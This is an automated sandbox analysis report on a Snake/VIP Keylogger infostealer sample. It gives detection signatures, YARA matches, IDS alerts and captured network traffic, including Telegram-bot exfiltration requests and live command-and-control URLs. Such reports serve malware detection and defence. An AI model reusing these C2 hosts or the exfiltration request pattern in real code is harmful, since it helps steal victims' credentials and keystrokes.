Windows Analysis Report
173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe

Overview

General Information

Sample name: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Analysis ID: 1562938
MD5: 17fde190e651aee3335ed55eeaa1a6db
SHA1: 8bb498b5d6fc4a58043d9e51d80790083cecd1f7
SHA256: a7e6101a68d513260f4e380b8d9bc66f90cee222d6ef157201884f6f32ce4cf3
Tags: base64-decoded, exe, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
Source | Rule | Description | Author | Strings
173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 4D 88 44 24 2B 88 44 24 2F B0 4F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source | Rule | Description | Author | Strings
00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
          • 0x36591:$a1: get_encryptedPassword
          • 0x36565:$a2: get_encryptedUsername
          • 0x36629:$a3: get_timePasswordChanged
          • 0x36541:$a4: get_passwordField
          • 0x365a7:$a5: set_encryptedPassword
          • 0x36374:$a7: get_logins
          • 0x31c0c:$a10: KeyLoggerEventArgs
          • 0x31bdb:$a11: KeyLoggerEventArgsEventHandler
          • 0x36448:$a13: _encryptedPassword
Source | Rule | Description | Author | Strings
0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
0.0.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T09:46:58.437508+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 104.21.67.152 | 443 | TCP
2024-11-26T09:47:09.057527+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49718 | 104.21.67.152 | 443 | TCP
2024-11-26T09:47:20.265217+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49754 | 104.21.67.152 | 443 | TCP
2024-11-26T09:47:23.570571+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49761 | 104.21.67.152 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T09:46:53.806454+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-11-26T09:46:56.759609+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-11-26T09:47:00.103356+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49702 | 132.226.8.169 | 80 | TCP

                AV Detection

Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | Avira: detected
Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49767 version: TLS 1.2
                Source: Binary string: _.pdb source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06451663h0_2_06451368
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06450803h0_2_06450508
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064524BBh0_2_064521C0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06450CCBh0_2_064509D0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4800
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D3EA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4FEE
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4C18
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D4C16
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D5379
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D3E72
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D5BB6
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D58F8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_065D5924

                Networking

                Source: unknown | DNS query: name: api.telegram.org
                Source: Yara match | File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: POST /den/P4.php HTTP/1.1 | Content-Type: text/plain; charset=utf-8 | Host: the.drillmmcsnk.top | Content-Length: 1432 | Connection: Keep-Alive
                Source: Joe Sandbox View | IP Address: 132.226.8.169
                Source: Joe Sandbox View | IP Address: 149.154.167.220
                Source: Joe Sandbox View | IP Address: 104.21.67.152
                Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknown | DNS query: name: checkip.dyndns.org
                Source: unknown | DNS query: name: reallyfreegeoip.org
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 132.226.8.169:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 132.226.8.169:80
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49718 -> 104.21.67.152:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 104.21.67.152:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49761 -> 104.21.67.152:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49754 -> 104.21.67.152:443
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49700 version: TLS 1.0
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic | DNS traffic detected: DNS query: the.drillmmcsnk.top
                Source: unknown | HTTP traffic detected: POST /den/P4.php HTTP/1.1 | Content-Type: text/plain; charset=utf-8 | Host: the.drillmmcsnk.top | Content-Length: 1432 | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 26 Nov 2024 08:47:25 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1560769620.0000000005783000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1749864993.0000000005789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top/den/P4.php
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top/den/api.php
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20a
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002711000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000026E5000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000270C000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000026E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
